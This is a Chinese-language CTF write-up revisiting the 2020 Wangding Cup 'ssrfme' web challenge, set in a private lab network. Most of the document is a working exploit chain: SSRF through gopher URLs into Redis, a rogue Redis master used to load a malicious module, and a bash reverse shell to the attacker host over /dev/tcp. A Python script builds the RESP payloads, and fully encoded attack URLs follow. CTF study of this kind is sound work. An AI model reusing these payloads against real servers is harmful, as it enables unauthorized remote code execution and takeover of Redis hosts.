CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾
思路:SSRF结合redis主从复制RCE
Tip:使用DNS重绑定绕过限制
参考笔记:redis
主服务器:192.168.8.103
从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙)
第一步:使用脚本redis-rogue-server伪装redis主服务器:
python3 redis-rogue-server.py --server-only
第二步:在自控服务器用nc监听端口4607
第三步:攻击
首先确认在redis上要执行的命令:
config set dir /tmp/
config set dbfilename exp.so
slaveof 192.168.8.103 21000
module load /tmp/exp.so
system.exec 'bash -i >& /dev/tcp/192.168.8.103/4607 0>&1'
其次用redis_rdsp_z.py脚本转换一下命令:
python redis_resp_z.py
redis_rdsp_z.py:
#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
ip="192.168.8.104"
port="6379"
#有密码时加上下面的auth值
payload="gopher://"+ip+":"+port+"/_%2A2%0d%0a%244%0d%0aAUTH%0d%0a%247%0d%0a123.com%0D%0A"
#没密码时用下面的
#payload="gopher://"+ip+":"+port+"/_"
#命令的值中有空格就暂时先替换成${IFS},便于后面处理,如set 1 <qw er>写成set 1 <qw${IFS}er>。
cmd=[
"config set dir /tmp/",
"config set dbfilename exp.so",
"slaveof 192.168.8.103 21000",
"module load /tmp/exp.so",
"system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
"quit"
]
'''
"config set dir /tmp/",
"config set dbfilename exp.so",
"slaveof 192.168.8.103 21000",
"quit"
'''
'''
"module load /tmp/exp.so",
"system.exec bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.8.103/4607${IFS}0>&1",
"quit"
'''
def tran_rdsp(x):
#这是前面空格暂时先替换成${IFS}的原因。
x_split = x.split(" ")
#加*,因为RDSP协议中,对于array,回复的第一个字节是*。
cmd=""
cmd+="*"+str(len(x_split))
#加$,因为RDSP协议中,对于Bulk Strings,回复的第一个字节是$,顺便再把${IFS}换回空格。
for i in x_split:
cmd+="\r\n"+"$"+str(len((i.replace("${IFS}"," "))))+"\r\n"+i.replace("${IFS}"," ")
cmd+="\r\n"
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(tran_rdsp(x))
print payload
其三,将转换后的命令再URL编码一次:
gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A
其四:攻击
第一种方式
#执行一次后,等几秒再执行一次,监听端即可收到shell。
#原因是:这里将所有命令一次性发过去,第一次执行时模块未加载完,反弹shell的命令执行失败。第二次执行时模块已加载,反弹shell的命令执行成功。
http://192.168.8.104:8080/index.php?url=gopher%3A%2F%2F192.168.8.104%3A6379%2F_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%25247%250d%250a123.com%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25247%250D%250Aslaveof%250D%250A%252413%250D%250A192.168.8.103%250D%250A%25245%250D%250A21000%250D%250A%252A3%250D%250A%25246%250D%250Amodule%250D%250A%25244%250D%250Aload%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252443%250D%250Abash%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.8.103%2F4607%25200%253E%25261%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A
第二种方式
空格都用%2520替换,换行都用%250d%250a替换。依次执行下面三句即可执行命令:
http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.8.103%252021000%250d%250aquit
http://192.168.8.104:8080/index.php?url=gopher://127.0.0.1:6379/_auth%2520123.com%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.exec%2520id%250d%250aquit
#第三句中,system.exec id等可以执行,system.exec bash -i >& /dev/tcp/192.168.8.103/4607 0>&1执行失败;且system.rev报错无命令。